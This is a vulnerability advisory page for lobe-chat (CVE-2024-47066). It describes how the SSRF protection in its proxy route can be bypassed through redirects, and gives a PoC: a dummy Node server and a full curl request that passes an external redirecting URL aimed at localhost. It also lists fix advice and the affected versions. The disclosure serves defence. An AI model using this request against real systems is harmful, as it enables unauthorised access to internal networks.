Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS0zZmM4LTJyM2YtOHdyZ84AA_um

lobe-chat implemented an insufficient fix for GHSA-mxhq-xw3g-rphc (CVE-2024-32964)

Summary

SSRF protection implemented in https://github.com/lobehub/lobe-chat/blob/main/src/app/api/proxy/route.ts does not consider redirect and could be bypassed when attacker provides external malicious url which redirects to internal resources like private network or loopback address.

PoC

  1. Run lobe-chat in docker container. In my setup lobe-chat runs on 0.0.0.0:3210;

  2. Create file dummy-server.js with the following content:

var http = require('http');
console.log("running server");
http.createServer(function (req, res) {
  console.log(req.url);
  res.writeHead(200, {'Content-Type': 'text/html'});
  res.end();
}).listen(3001, 'localhost');

And run

node dummy-server.js

as an example server inside of container [1] (or in containers private network).

  1. Run in terminal to perform request to lobe-chat instance from [1]
curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: 0.0.0.0:3210' -H $'Accept-Encoding: gzip, deflate, br' -H $'Referer: http://0.0.0.0:3210/settings/agent?agent=&session=inbox&tab=' -H $'Content-Type: text/plain;charset=UTF-8' -H $'Content-Length: 74' -H $'Origin: http://0.0.0.0:3210' -H $'Connection: keep-alive' -H $'Priority: u=0' \
    -b $'LOBE_LOCALE=en-EN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined' \
    --data-binary $'http://130.193.49.129:8090/redirect?url=http://localhost:3001/iamssrf_1337' \
    $'http://0.0.0.0:3210/api/proxy'

where body contains url of server which redirects to internal network (in my case it redirects according url parameter).

  1. Observe in output of [2]
running server
/iamssrf_1337
  1. Attacker is able to perform SSRF attacks against lobe-chat despite https://github.com/lobehub/lobe-chat/blob/main/src/app/api/proxy/route.ts#L26 check.

Fix recommendations:

  1. Disable redirects - lobe-chat should consider explicitly disable redirects.
  2. If redirects support is required, perform check before each http request.

Impact

https://portswigger.net/web-security/ssrf

Permalink: https://github.com/advisories/GHSA-3fc8-2r3f-8wrg
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0zZmM4LTJyM2YtOHdyZ84AA_um
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 20 days ago
Updated: 13 days ago


CVSS Score: 9.0
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H

Identifiers: GHSA-3fc8-2r3f-8wrg, CVE-2024-47066
References: Repository: https://github.com/lobehub/lobe-chat
Blast Radius: 1.0

Affected Packages

npm:@lobehub/chat
Dependent packages: 0
Dependent repositories: 0
Downloads: 27,233 last month
Affected Version Ranges: <= 1.19.12
Fixed in: 1.19.13
All affected versions: 0.1.6, 0.2.0, 0.3.0, 0.4.0, 0.4.1, 0.4.2, 0.4.3, 0.5.0, 0.6.0, 0.6.1, 0.7.0, 0.8.0, 0.8.1, 0.8.2, 0.9.0, 0.10.0, 0.10.1, 0.10.2, 0.11.0, 0.12.0, 0.12.1, 0.13.0, 0.13.1, 0.14.0, 0.15.0, 0.15.1, 0.16.0, 0.16.1, 0.17.0, 0.18.0, 0.18.1, 0.18.2, 0.19.0, 0.20.0, 0.21.0, 0.22.0, 0.22.1, 0.22.2, 0.23.0, 0.24.0, 0.25.0, 0.26.0, 0.26.1, 0.27.0, 0.27.1, 0.27.2, 0.27.3, 0.27.4, 0.28.0, 0.29.0, 0.30.0, 0.30.1, 0.31.0, 0.32.0, 0.33.0, 0.34.0, 0.35.0, 0.35.1, 0.36.0, 0.36.1, 0.37.0, 0.38.0, 0.39.0, 0.39.1, 0.39.2, 0.39.3, 0.39.4, 0.40.0, 0.40.1, 0.40.2, 0.40.3, 0.40.4, 0.40.5, 0.40.6, 0.40.7, 0.41.0, 0.41.1, 0.41.2, 0.42.0, 0.42.1, 0.42.2, 0.42.3, 0.43.0, 0.44.0, 0.44.1, 0.44.2, 0.44.3, 0.44.4, 0.45.0, 0.46.0, 0.46.1, 0.47.0, 0.48.0, 0.49.0, 0.50.0, 0.51.0, 0.52.0, 0.52.1, 0.53.0, 0.54.0, 0.54.1, 0.54.2, 0.54.3, 0.54.4, 0.55.0, 0.55.1, 0.56.0, 0.57.0, 0.58.0, 0.59.0, 0.60.0, 0.60.1, 0.60.2, 0.60.3, 0.60.4, 0.61.0, 0.62.0, 0.62.1, 0.63.0, 0.63.1, 0.63.2, 0.63.3, 0.64.0, 0.64.1, 0.65.0, 0.65.1, 0.66.0, 0.67.0, 0.68.0, 0.68.1, 0.69.0, 0.69.1, 0.70.0, 0.70.1, 0.70.2, 0.70.3, 0.70.4, 0.71.0, 0.71.1, 0.72.0, 0.72.1, 0.72.2, 0.72.3, 0.72.4, 0.73.0, 0.74.0, 0.75.0, 0.76.0, 0.76.1, 0.76.2, 0.77.0, 0.77.1, 0.77.2, 0.78.0, 0.78.1, 0.79.0, 0.79.1, 0.79.2, 0.79.3, 0.79.4, 0.79.5, 0.79.6, 0.79.7, 0.79.8, 0.80.0, 0.80.1, 0.80.2, 0.81.0, 0.82.1, 0.82.2, 0.82.3, 0.82.4, 0.82.5, 0.82.6, 0.82.7, 0.82.8, 0.82.9, 0.83.0, 0.83.1, 0.83.2, 0.83.3, 0.83.4, 0.83.5, 0.83.6, 0.83.7, 0.83.8, 0.83.9, 0.83.10, 0.84.0, 0.85.0, 0.85.1, 0.85.2, 0.85.3, 0.86.0, 0.86.1, 0.86.2, 0.86.3, 0.86.4, 0.86.5, 0.87.0, 0.88.0, 0.89.0, 0.89.1, 0.89.2, 0.89.3, 0.89.4, 0.89.5, 0.89.6, 0.89.7, 0.89.8, 0.89.9, 0.89.10, 0.90.0, 0.90.1, 0.90.2, 0.90.3, 0.91.0, 0.92.0, 0.93.0, 0.94.0, 0.94.1, 0.94.2, 0.94.3, 0.94.4, 0.94.5, 0.95.0, 0.95.1, 0.96.0, 0.96.1, 0.96.2, 0.96.3, 0.96.4, 0.96.5, 0.96.6, 0.96.7, 0.96.8, 0.96.9, 0.97.0, 0.97.1, 0.98.0, 0.98.1, 0.98.2, 0.98.3, 0.99.0, 0.99.1, 0.100.0, 0.100.1, 0.100.2, 0.100.3, 0.100.4, 0.100.5, 0.101.0, 0.101.1, 0.101.2, 0.101.3, 0.101.4, 0.101.5, 0.101.6, 0.101.7, 0.102.0, 0.102.1, 0.102.2, 0.102.3, 0.102.4, 0.103.0, 0.103.1, 0.104.0, 0.105.0, 0.105.1, 0.105.2, 0.106.0, 0.107.0, 0.107.1, 0.107.2, 0.107.3, 0.107.4, 0.107.5, 0.107.6, 0.107.7, 0.107.8, 0.107.9, 0.107.10, 0.107.11, 0.107.12, 0.107.13, 0.107.14, 0.107.15, 0.107.16, 0.108.0, 0.109.0, 0.109.1, 0.110.0, 0.110.1, 0.110.2, 0.110.3, 0.110.4, 0.110.5, 0.110.6, 0.110.7, 0.110.8, 0.110.9, 0.110.10, 0.111.0, 0.111.1, 0.111.2, 0.111.3, 0.111.4, 0.111.5, 0.111.6, 0.112.0, 0.112.1, 0.113.0, 0.113.1, 0.114.0, 0.114.1, 0.114.2, 0.114.3, 0.114.4, 0.114.5, 0.114.6, 0.114.7, 0.114.8, 0.114.9, 0.115.0, 0.115.1, 0.115.2, 0.115.3, 0.115.4, 0.115.5, 0.115.6, 0.115.7, 0.115.8, 0.115.9, 0.115.10, 0.115.11, 0.115.12, 0.115.13, 0.116.0, 0.116.1, 0.116.2, 0.116.3, 0.116.4, 0.116.5, 0.117.0, 0.117.1, 0.117.2, 0.117.3, 0.117.4, 0.117.5, 0.118.0, 0.118.1, 0.118.2, 0.118.3, 0.118.4, 0.118.5, 0.118.6, 0.118.7, 0.118.8, 0.118.9, 0.118.10, 0.119.0, 0.119.1, 0.119.2, 0.119.3, 0.119.4, 0.119.5, 0.119.6, 0.119.7, 0.119.8, 0.119.9, 0.119.10, 0.119.11, 0.119.12, 0.119.13, 0.120.0, 0.120.1, 0.120.2, 0.120.3, 0.120.4, 0.120.5, 0.120.6, 0.121.0, 0.121.1, 0.121.2, 0.121.3, 0.121.4, 0.122.0, 0.122.1, 0.122.2, 0.122.3, 0.122.4, 0.122.5, 0.122.6, 0.122.7, 0.122.8, 0.122.9, 0.123.0, 0.123.1, 0.123.2, 0.123.3, 0.123.4, 0.124.0, 0.124.1, 0.124.2, 0.124.3, 0.125.0, 0.126.0, 0.126.1, 0.126.2, 0.126.3, 0.126.4, 0.126.5, 0.127.0, 0.127.1, 0.127.2, 0.128.0, 0.128.1, 0.128.2, 0.128.3, 0.128.4, 0.128.5, 0.128.6, 0.128.7, 0.128.8, 0.128.9, 0.128.10, 0.129.0, 0.129.1, 0.129.2, 0.129.3, 0.129.4, 0.129.5, 0.129.6, 0.130.0, 0.130.1, 0.130.2, 0.130.3, 0.130.4, 0.130.5, 0.130.6, 0.130.7, 0.131.0, 0.132.0, 0.132.1, 0.132.2, 0.133.0, 0.133.1, 0.133.2, 0.133.3, 0.133.4, 0.133.5, 0.134.0, 0.134.1, 0.135.0, 0.135.1, 0.135.2, 0.135.3, 0.135.4, 0.136.0, 0.137.0, 0.138.0, 0.138.1, 0.138.2, 0.139.0, 0.139.1, 0.139.2, 0.140.0, 0.140.1, 0.141.0, 0.141.1, 0.141.2, 0.142.0, 0.142.1, 0.142.2, 0.142.3, 0.142.4, 0.142.5, 0.142.6, 0.142.7, 0.142.8, 0.142.9, 0.143.0, 0.144.0, 0.144.1, 0.145.0, 0.145.1, 0.145.2, 0.145.3, 0.145.4, 0.145.5, 0.145.6, 0.145.7, 0.145.8, 0.145.9, 0.145.10, 0.145.11, 0.145.12, 0.145.13, 0.146.0, 0.146.1, 0.146.2, 0.147.0, 0.147.1, 0.147.2, 0.147.3, 0.147.4, 0.147.5, 0.147.6, 0.147.7, 0.147.8, 0.147.9, 0.147.10, 0.147.11, 0.147.12, 0.147.13, 0.147.14, 0.147.15, 0.147.16, 0.147.17, 0.147.18, 0.147.19, 0.147.20, 0.147.21, 0.147.22, 0.148.0, 0.148.1, 0.148.2, 0.148.3, 0.148.4, 0.148.5, 0.148.6, 0.148.7, 0.148.8, 0.148.9, 0.148.10, 0.149.0, 0.149.1, 0.149.2, 0.149.3, 0.149.4, 0.149.5, 0.149.6, 0.150.0, 0.150.1, 0.150.2, 0.150.3, 0.150.4, 0.150.5, 0.150.6, 0.150.7, 0.150.8, 0.150.9, 0.150.10, 0.151.0, 0.151.1, 0.151.2, 0.151.3, 0.151.4, 0.151.5, 0.151.6, 0.151.7, 0.151.8, 0.151.9, 0.151.10, 0.151.11, 0.152.0, 0.152.1, 0.152.2, 0.152.3, 0.152.4, 0.152.5, 0.152.6, 0.152.7, 0.152.8, 0.152.9, 0.152.10, 0.152.11, 0.152.12, 0.153.0, 0.153.1, 0.154.0, 0.154.1, 0.154.2, 0.154.3, 0.154.4, 0.154.5, 0.154.6, 0.154.7, 0.155.0, 0.155.1, 0.155.2, 0.155.3, 0.155.4, 0.155.5, 0.155.6, 0.155.7, 0.155.8, 0.155.9, 0.156.0, 0.156.1, 0.156.2, 0.157.0, 0.157.1, 0.157.2, 0.158.0, 0.158.1, 0.158.2, 0.159.0, 0.159.1, 0.159.2, 0.159.3, 0.159.4, 0.159.5, 0.159.6, 0.159.7, 0.159.8, 0.159.9, 0.159.10, 0.159.11, 0.159.12, 0.160.0, 0.160.1, 0.160.2, 0.160.3, 0.160.4, 0.160.5, 0.160.6, 0.160.7, 0.160.8, 0.161.0, 0.161.1, 0.161.2, 0.161.3, 0.161.4, 0.161.5, 0.161.6, 0.161.7, 0.161.8, 0.161.9, 0.161.10, 0.161.11, 0.161.12, 0.161.13, 0.161.14, 0.161.15, 0.161.16, 0.161.17, 0.161.18, 0.161.19, 0.161.20, 0.161.21, 0.161.22, 0.161.23, 0.161.24, 0.161.25, 0.162.0, 0.162.1, 0.162.2, 0.162.3, 0.162.4, 0.162.5, 0.162.6, 0.162.7, 0.162.8, 0.162.9, 0.162.10, 0.162.11, 0.162.12, 0.162.13, 0.162.14, 0.162.15, 0.162.16, 0.162.17, 0.162.18, 0.162.19, 0.162.20, 0.162.21, 0.162.22, 0.162.23, 0.162.24, 0.162.25, 0.163.0, 0.164.0, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.0.8, 1.0.9, 1.0.10, 1.0.11, 1.0.12, 1.0.13, 1.0.14, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.1.5, 1.1.6, 1.1.7, 1.1.8, 1.1.9, 1.1.10, 1.1.11, 1.1.12, 1.1.13, 1.1.14, 1.1.15, 1.1.16, 1.1.17, 1.1.18, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.5, 1.2.6, 1.2.7, 1.2.8, 1.2.9, 1.2.10, 1.2.11, 1.2.12, 1.2.13, 1.2.14, 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4, 1.3.5, 1.3.6, 1.4.0, 1.4.1, 1.4.2, 1.4.3, 1.5.0, 1.5.1, 1.5.2, 1.5.3, 1.5.4, 1.5.5, 1.6.0, 1.6.1, 1.6.2, 1.6.3, 1.6.4, 1.6.5, 1.6.6, 1.6.7, 1.6.8, 1.6.9, 1.6.10, 1.6.11, 1.6.12, 1.6.13, 1.6.14, 1.6.15, 1.7.0, 1.7.1, 1.7.2, 1.7.3, 1.7.4, 1.7.5, 1.7.6, 1.7.7, 1.7.8, 1.7.9, 1.7.10, 1.8.0, 1.8.1, 1.8.2, 1.9.0, 1.9.1, 1.9.2, 1.9.3, 1.9.4, 1.9.5, 1.9.6, 1.9.7, 1.9.8, 1.10.0, 1.10.1, 1.11.0, 1.11.1, 1.11.2, 1.11.3, 1.11.4, 1.11.5, 1.11.6, 1.11.7, 1.11.8, 1.11.9, 1.12.0, 1.12.1, 1.12.2, 1.12.3, 1.12.4, 1.12.5, 1.12.6, 1.12.7, 1.12.8, 1.12.9, 1.12.10, 1.12.11, 1.12.12, 1.12.13, 1.12.14, 1.12.15, 1.12.16, 1.12.17, 1.12.18, 1.12.19, 1.12.20, 1.13.0, 1.13.1, 1.13.2, 1.14.0, 1.14.1, 1.14.2, 1.14.3, 1.14.4, 1.14.5, 1.14.6, 1.14.7, 1.14.8, 1.14.9, 1.14.10, 1.14.11, 1.14.12, 1.15.0, 1.15.1, 1.15.2, 1.15.3, 1.15.4, 1.15.5, 1.15.6, 1.15.7, 1.15.8, 1.15.9, 1.15.10, 1.15.11, 1.15.12, 1.15.13, 1.15.14, 1.15.15, 1.15.16, 1.15.17, 1.15.18, 1.15.19, 1.15.20, 1.15.21, 1.15.22, 1.15.23, 1.15.24, 1.15.25, 1.15.26, 1.15.27, 1.15.28, 1.15.29, 1.15.30, 1.15.31, 1.15.32, 1.15.33, 1.15.34, 1.15.35, 1.16.0, 1.16.1, 1.16.2, 1.16.3, 1.16.4, 1.16.5, 1.16.6, 1.16.7, 1.16.8, 1.16.9, 1.16.10, 1.16.11, 1.16.12, 1.16.13, 1.16.14, 1.17.0, 1.17.1, 1.17.2, 1.17.3, 1.17.4, 1.17.5, 1.17.6, 1.17.7, 1.18.0, 1.18.1, 1.18.2, 1.19.0, 1.19.1, 1.19.2, 1.19.3, 1.19.4, 1.19.5, 1.19.6, 1.19.7, 1.19.8, 1.19.9, 1.19.10, 1.19.11, 1.19.12
All unaffected versions: 1.19.13, 1.19.14, 1.19.15, 1.19.16, 1.19.17, 1.19.18, 1.19.19, 1.19.20, 1.19.21, 1.19.22, 1.19.23, 1.19.24, 1.19.25, 1.19.26, 1.19.27, 1.19.28, 1.19.29, 1.19.30, 1.19.31, 1.19.32, 1.19.33, 1.19.34, 1.19.35, 1.19.36, 1.20.0, 1.20.1, 1.20.2, 1.20.3, 1.20.4, 1.20.5, 1.20.6, 1.20.7, 1.20.8, 1.21.0, 1.21.1, 1.21.2, 1.21.3, 1.21.4, 1.21.5, 1.21.6, 1.21.7, 1.21.8, 1.21.9, 1.21.10, 1.21.11, 1.21.12, 1.21.13, 1.21.14, 1.21.15, 1.21.16